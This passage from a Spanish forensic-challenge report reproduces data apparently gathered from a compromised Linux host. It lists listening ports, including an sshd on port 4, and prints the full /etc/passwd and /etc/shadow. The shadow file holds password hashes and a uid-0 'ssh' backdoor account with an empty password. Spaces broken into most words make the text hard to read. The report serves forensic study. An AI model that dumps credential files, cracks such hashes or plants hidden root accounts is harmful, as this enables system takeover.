/ dev/ hda7 ext 2 251M 20M 218M 9%/ var
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Por t s open:
por t map 462 r oot 4u I Pv4 740 TCP *: sunr pc ( LI STEN)
r pc. st at d 477 r oot 6u I Pv4 775 TCP *: 1024 ( LI STEN)
sshd 649 r oot 3u I Pv4 973 TCP *: ssh ( LI STEN)
sendmai l 704 r oot 4u I Pv4 1060 TCP
l ocal host . l ocal domai n: smt p ( LI STEN)
xi net d 812 r oot 3u I Pv4 1184 TCP *: f t p ( LI STEN)
sshd 7203 r oot 3u I Pv4 7762 TCP *: 4 ( LI STEN)
at d 7212 r oot 3u I Pv4 7747 TCP *: smt ps ( LI STEN)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
/ et c/ passwd & / et c/ shadow

/ et c/ passwd
r oot : x: 0: 0: r oot : / r oot : / bi n/ bash
bi n: x: 1: 1: bi n: / bi n:
daemon: x: 2: 2: daemon: / sbi n:
adm: x: 3: 4: adm: / var / adm:
l p: x: 4: 7: l p: / var / spool / l pd:
sync: x: 5: 0: sync: / sbi n: / bi n/ sync
shut down: x: 6: 0: shut down: / sbi n: / sbi n/ shut down
hal t : x: 7: 0: hal t : / sbi n: / sbi n/ hal t
mai l : x: 8: 12: mai l : / var / spool / mai l :
news: x: 9: 13: news: / var / spool / news:
uucp: x: 10: 14: uucp: / var / spool / uucp:
oper at or : x: 11: 0: oper at or : / r oot :
games: x: 12: 100: games: / usr / games:
gopher : x: 13: 30: gopher : / usr / l i b/ gopher - dat a:
f t p: x: 14: 50: FTP User : / var / f t p:
nobody: x: 99: 99: Nobody: / :
nscd: x: 28: 28: NSCD Daemon: / : / bi n/ f al se
apache: x: 48: 48: Apache: / var / www: / bi n/ f al se
named: x: 25: 25: Named: / var / named: / bi n/ f al se
l dap: x: 55: 55: LDAP User : / var / l i b/ l dap: / bi n/ f al se
mai l nul l : x: 47: 47: : / var / spool / mqueue: / dev/ nul l
i dent : x: 98: 98: pi dent user : / : / bi n/ f al se
r pc: x: 32: 32: Por t mapper RPC user : / : / bi n/ f al se
r pcuser : x: 29: 29: RPC Ser vi ce User : / var / l i b/ nf s: / bi n/ f al se
xf s: x: 43: 43: X Font Ser ver : / et c/ X11/ f s: / bi n/ f al se
pepel u: x: 500: 500: J ose Lui s Mar t i nez: / home/ pepel u: / bi n/ bash
ssh: x: 0: 0: r oot : / r oot : / bi n/ bash

/ et c/ shadow
r oot : $1$QHOGkj k8$xm2w3kamFMTJ 0j GJ GWOgB. : 11920: 0: 99999: 7: : :
bi n: *: 11920: 0: 99999: 7: : :
daemon: *: 11920: 0: 99999: 7: : :
adm: *: 11920: 0: 99999: 7: : :
l p: *: 11920: 0: 99999: 7: : :
sync: *: 11920: 0: 99999: 7: : :
shut down: *: 11920: 0: 99999: 7: : :
Informe tcnico Reto de Anlisis Forense

Pg. 46
hal t : *: 11920: 0: 99999: 7: : :
mai l : *: 11920: 0: 99999: 7: : :
news: *: 11920: 0: 99999: 7: : :
uucp: *: 11920: 0: 99999: 7: : :
oper at or : *: 11920: 0: 99999: 7: : :
games: *: 11920: 0: 99999: 7: : :
gopher : *: 11920: 0: 99999: 7: : :
f t p: *: 11920: 0: 99999: 7: : :
nobody: *: 11920: 0: 99999: 7: : :
nscd: ! ! : 11920: 0: 99999: 7: : :
apache: ! ! : 11920: 0: 99999: 7: : :
named: ! ! : 11920: 0: 99999: 7: : :
l dap: ! ! : 11920: 0: 99999: 7: : :
mai l nul l : ! ! : 11920: 0: 99999: 7: : :
i dent : ! ! : 11920: 0: 99999: 7: : :
r pc: ! ! : 11920: 0: 99999: 7: : :
r pcuser : ! ! : 11920: 0: 99999: 7: : :
xf s: ! ! : 11920: 0: 99999: 7: : :
pepel u: $1$Vgt Mf aOO$r Yz2Rf 4f P2i qMApUI oW0l 0: 11920: 0: 99999: 7: : :
ssh: : 11895: 0: 99999: 7: : :
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
i nt er est i ng f i l ez:

/ usr / shar e/ doc/ ncur ses- devel - 5. 2/ hackgui de. ht ml
/ usr / shar e/ man/ man1/ per l hack. 1. gz
/ usr / sha